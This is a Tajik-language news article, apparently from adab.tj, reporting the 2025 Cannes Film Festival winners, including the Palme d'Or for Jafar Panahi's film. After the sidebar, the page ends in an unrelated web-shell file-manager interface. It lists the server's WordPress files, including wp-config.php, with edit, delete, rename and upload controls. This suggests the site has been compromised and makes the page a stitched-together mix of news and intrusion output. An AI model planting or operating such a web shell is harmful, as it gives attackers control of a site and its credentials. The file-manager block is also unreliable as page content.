36.2 C
Душанбе

Барандагони ҷашнвораи Кан эълом шуданд. «Нахли тило»-ро кадом филм бурд?

Филми “Арзиши эҳсосӣ”-и Ёхайм Триер аз Норвеж ҷоизаи бузурги 78-умин давраи Ҷашнвораи байналмилалии филмҳои Канро, ки маросими ҷоизасупорияш рӯзи 24-уми май дар Фаронса сурат гирифт, ба даст овард.

Ба гузориши вебгоҳи расмии ҷашнвораи Кан, филми “Як тасодуфи сода”-и коргардони эронӣ Ҷаъфар Паноҳӣ ба «Нахли тило» – муҳимтарин ҷоизаи ин давраи ҷашнвора эҳдо шуд. Пас аз филми “Таъми гелос”-и коргардон Аббос Киёрустамӣ ин ҷоизаи дувумин барои синамои Эрон шумурда мешавад.

Дар баробари ин ҷоизаи беҳтарин коргардонӣ ва беҳтарин бозигари мард ба филми “Маъмури махфӣ”, Клебер Мендонса Филю аз Бразил, ки нақши асосиро Вагнер Моура иҷро кардааст, эъто гардид.

Ҷоизаи ҳайати доварон ба ду филм – “Сирот”, филми коргардони фаронсавӣ Оливер Лаукс ва “Садои суқут”, филми коргардони олмонӣ Маша Шилинский тақдим шуд.

Надя Мелитӣ барои нақшофаринӣ дар филми “Хоҳари хурдӣ” ба коргардонии фаронсавӣ Ҳафсия Ҳарзӣ соҳиби ҷоизаи беҳтарин бозигари зан шуд.

Аз сӯйи дигар бародарони белжикӣ Жан-Пиер Дарден ва Люк Дарден барои филми “Модарони ҷавон” ҷоизаи беҳтарин филмномаро ба даст оварданд.

Ҷоизаи беҳтарин филми аввал ба Ҳасан Ҳодӣ аз Ироқ барои филми “Торти раиси ҷумҳур” супурда шуд.Филми “Хушҳолам, ки ҳоло мурдаӣ”-и коргардони фаластинӣ Тавфиқ Барҳум сазовори ҷоизаи беҳтарин филми кӯтоҳ дониста шуд.

Ёдоварӣ мекунем, ки Ҷашнвораи байналмилалии филмҳои Кан аз 13 то 24-уми май дар шаҳри Кани Фаронса баргузор шуд, ки аз соли 1946 ба ин сӯ роҳандозӣ мешавад. Раиси ҳайати доварони мусобиқаи аслии имсолаи ҷашнвораи Кан Жулет Бинуш, бозигари фаронсавӣ мебошад.

- Таблиғ -spot_img

Быть в курсе

Подпишитесь на обновления материалов сайта adab.tj на ваш электронный ящик.

- Таблиғ -spot_img

Хабарҳои охир

Акси гӯё

Бахшҳо

[-] Failed to delete file
Current Dir: /var/www/adab.tj/html/

[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR]  www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Upload File: